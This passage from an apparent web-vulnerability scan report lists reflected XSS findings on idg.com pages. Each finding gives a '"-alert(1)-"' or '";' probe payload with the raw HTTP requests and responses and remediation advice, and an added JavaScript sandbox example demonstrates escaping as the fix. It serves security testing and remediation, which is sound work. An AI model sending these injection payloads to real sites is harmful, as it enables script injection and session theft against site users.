GET /www/HomeNew.nsf/docs/News_Service_Intro?82f97"-alert(1)-"2417de8ae21=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/News_Service_Intro?82f97"-alert(1)-"2417de8ae21=1");
} catch(err) {}</script>
...[SNIP]...

2.118. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Tech_Update

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string enclosed in double quotation marks. The payload c9d27"%3bed6f933dbda was submitted in REST URL parameter 1 and was echoed as c9d27";ed6f933dbda in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /wwwc9d27"%3bed6f933dbda/HomeNew.nsf/docs/Tech_Update HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwc9d27";ed6f933dbda/HomeNew.nsf/docs/Tech_Update");
} catch(err) {}</script>
...[SNIP]...

2.119. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Tech_Update

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string enclosed in double quotation marks. The payload e2ca0"%3b337c5265295 was submitted in REST URL parameter 3 and was echoed as e2ca0";337c5265295 in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docse2ca0"%3b337c5265295/Tech_Update HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docse2ca0";337c5265295/Tech_Update");
} catch(err) {}</script>
...[SNIP]...

2.120. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Tech_Update

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string enclosed in double quotation marks. The payload 5393d"%3b6d1b7fafa03 was submitted in REST URL parameter 4 and was echoed as 5393d";6d1b7fafa03 in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docs/Tech_Update5393d"%3b6d1b7fafa03 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Tech_Update5393d";6d1b7fafa03");
} catch(err) {}</script>
...[SNIP]...

2.121. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Tech_Update

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string enclosed in double quotation marks. The payload 5f0fb"-alert(1)-"5adeeb9e27 was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the string literal, subtracts the result of alert(1) and opens a new string, so the statement stays syntactically valid and alert(1) runs when the block executes; the page's try/catch wrapper does not prevent this. The server answered with HTTP 400 Bad Request, which does not affect exploitability: the browser renders the body and executes the script it contains.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www/HomeNew.nsf/docs/Tech_Update?5f0fb"-alert(1)-"5adeeb9e27=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5032
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Tech_Update?5f0fb"-alert(1)-"5adeeb9e27=1");
} catch(err) {}</script>
...[SNIP]...
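Every idg.com finding in this part of the report lands in the same _trackPageview("...") string literal; what separates the Certain findings from the Firm ones is whether the echoed payload leaves the script block parseable. The JavaScript below is an added example, not code from this report, from Burp or from idg.com. It rebuilds that concatenation, runs the two payload shapes the report shows against it in a sandbox (the "-alert(1)-" query-string form from finding 2.121 and the "; path-segment form from finding 2.120), and applies the JavaScript-string escaping the remediation text calls for. The helper names, the stub tracker, the stub alert() and the use of new Function as a stand-in for the browser's script parser are this example's own assumptions.

```javascript
// Added example (not code from the Hoyt LLC / Burp report or from idg.com).
// Reproduces the _trackPageview("...") concatenation seen in the responses
// above, runs the report's two payload shapes against it, and shows the
// escaping that stops the break-out. Helper names, the stub tracker and the
// new Function sandbox are this example's own.

// Escape a value for placement inside a double-quoted JavaScript string
// literal that sits in an HTML <script> block. Quote and backslash stop the
// string break-out; '/', '<' and '>' stop a "</script>" inside the value from
// ending the block (the HTML parser runs before the JS parser and ignores JS
// escapes); U+2028/U+2029 and the ASCII line terminators would otherwise end
// the literal. Everything is emitted as \uXXXX so the result is plain ASCII.
function escapeForJsString(value) {
  return String(value).replace(/[\\"'<>\/\u2028\u2029\r\n\t]/g, function (ch) {
    const hex = ch.charCodeAt(0).toString(16);
    return '\\u' + '0000'.slice(hex.length) + hex;
  });
}

// Vulnerable construction implied by the responses: the request URL is
// concatenated straight into the string literal.
function buildSnippetVulnerable(requestUrl) {
  return 'pageTracker._trackPageview("IDG.com - Page not found - ' + requestUrl + '");';
}

// Hardened form: same statement, value escaped for the JS-string context.
function buildSnippetSafe(requestUrl) {
  return 'pageTracker._trackPageview("IDG.com - Page not found - ' + escapeForJsString(requestUrl) + '");';
}

// Run a generated statement with a stub tracker and a stub alert().
// A SyntaxError from new Function models the browser discarding the whole
// <script> block; the try/catch around the call models the page's own
// try { ... } catch(err) {} wrapper, which only handles runtime errors.
function runSnippet(snippet) {
  const result = { parsed: false, alertFired: false, tracked: null };
  const pageTracker = { _trackPageview: function (s) { result.tracked = s; } };
  const alert = function () { result.alertFired = true; };
  let fn;
  try {
    fn = new Function('pageTracker', 'alert', snippet);
  } catch (err) {
    return result; // parse failure: nothing in the block runs
  }
  result.parsed = true;
  try { fn(pageTracker, alert); } catch (err) {}
  return result;
}

// Constructed request URLs using the two payload shapes from the report:
// the query-string form (finding 2.121) and the path-segment form (2.120).
const QUERY_PAYLOAD_URL = '/www/HomeNew.nsf/docs/Tech_Update?5f0fb"-alert(1)-"5adeeb9e27=1';
const PATH_PAYLOAD_URL = '/www/HomeNew.nsf/docs/Tech_Update5393d";6d1b7fafa03';

// Exercise both payloads against the vulnerable and the hardened snippet.
function demo() {
  return {
    query: {
      vulnerable: runSnippet(buildSnippetVulnerable(QUERY_PAYLOAD_URL)),
      safe: runSnippet(buildSnippetSafe(QUERY_PAYLOAD_URL))
    },
    path: {
      vulnerable: runSnippet(buildSnippetVulnerable(PATH_PAYLOAD_URL)),
      safe: runSnippet(buildSnippetSafe(PATH_PAYLOAD_URL))
    }
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running demo() shows the split the report's confidence levels reflect: the query-string payload parses and fires alert() because "..." - alert(1) - "..." is a valid expression, while the path-segment payload leaves an unbalanced quote, so the block never parses and nothing runs. With escapeForJsString applied, both URLs parse and the tracked string round-trips to the original value with no alert. The sandbox is only a model; in a real page a parse error cannot be caught by a try/catch inside the same block, which is why the wrapper on idg.com offers no protection either way.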

2.122. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string enclosed in double quotation marks. The payload 3b76d"%3b5c59a29b3cd was submitted in REST URL parameter 1 and was echoed as 3b76d";5c59a29b3cd in the application's response: the URL-encoded %3b came back as a literal semicolon and the double quote was not escaped.

This shows that the JavaScript string into which the data is copied can be terminated. As echoed, the injected quote leaves the line with an unbalanced string literal, so the whole script block fails to parse and the browser discards it; the surrounding try/catch handles only runtime errors, not parse errors. An attempt to build a full proof-of-concept injecting arbitrary JavaScript through this path segment was not successful, and the report does not establish what blocked it. Since the same string is reached by a syntactically valid construct such as "-alert(1)-" in the findings for the name of an arbitrarily supplied request parameter on this host, the application's handling of path segments should be examined manually for input validation or other obstacles.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Here the request URL is concatenated into the _trackPageview call. Either derive the value client-side from window.location instead of echoing it server-side, or escape it for the JavaScript-string context (backslash, quotes, forward slash, angle brackets and line terminators encoded as \uXXXX). HTML entity encoding is the wrong encoding for this context, since entities are not decoded inside a script block.

Request

GET /www3b76d"%3b5c59a29b3cd/HomeNew.nsf/docs/U.S._Sales HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www3b76d";5c59a29b3cd/HomeNew.nsf/docs/U.S._Sales");
} catch(err) {}</script>
...[SNIP]...

2.123. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56031"%3b9d8b60f1346 was submitted in the REST URL parameter 3. This input was echoed as 56031";9d8b60f1346 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs56031"%3b9d8b60f1346/U.S._Sales HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs56031";9d8b60f1346/U.S._Sales");
} catch(err) {}</script>
...[SNIP]...

2.124. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e4f8"%3b82b293410c0 was submitted in the REST URL parameter 4. This input was echoed as 5e4f8";82b293410c0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/U.S._Sales5e4f8"%3b82b293410c0 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Sales5e4f8";82b293410c0");
} catch(err) {}</script>
...[SNIP]...

2.125. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658e5"-alert(1)-"271304f8b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/U.S._Sales?658e5"-alert(1)-"271304f8b46=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5032
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Sales?658e5"-alert(1)-"271304f8b46=1");
} catch(err) {}</script>
...[SNIP]...

2.126. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cd23"%3b6009fde32 was submitted in the REST URL parameter 1. This input was echoed as 4cd23";6009fde32 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www4cd23"%3b6009fde32/HomeNew.nsf/docs/about_IDG HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www4cd23";6009fde32/HomeNew.nsf/docs/about_IDG");
} catch(err) {}</script>
...[SNIP]...

2.127. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 770bb"%3b7fc456656cc was submitted in the REST URL parameter 3. This input was echoed as 770bb";7fc456656cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs770bb"%3b7fc456656cc/about_IDG HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs770bb";7fc456656cc/about_IDG");
} catch(err) {}</script>
...[SNIP]...

2.128. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e603"%3b0d69f7e74a7 was submitted in the REST URL parameter 4. This input was echoed as 8e603";0d69f7e74a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/about_IDG8e603"%3b0d69f7e74a7 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:50 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG8e603";0d69f7e74a7");
} catch(err) {}</script>
...[SNIP]...

2.129. http://idg.com/www/HomeNew.nsf/docs/about_IDG [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6071f"-alert(1)-"5649c346001 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/about_IDG?6071f"-alert(1)-"5649c346001=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
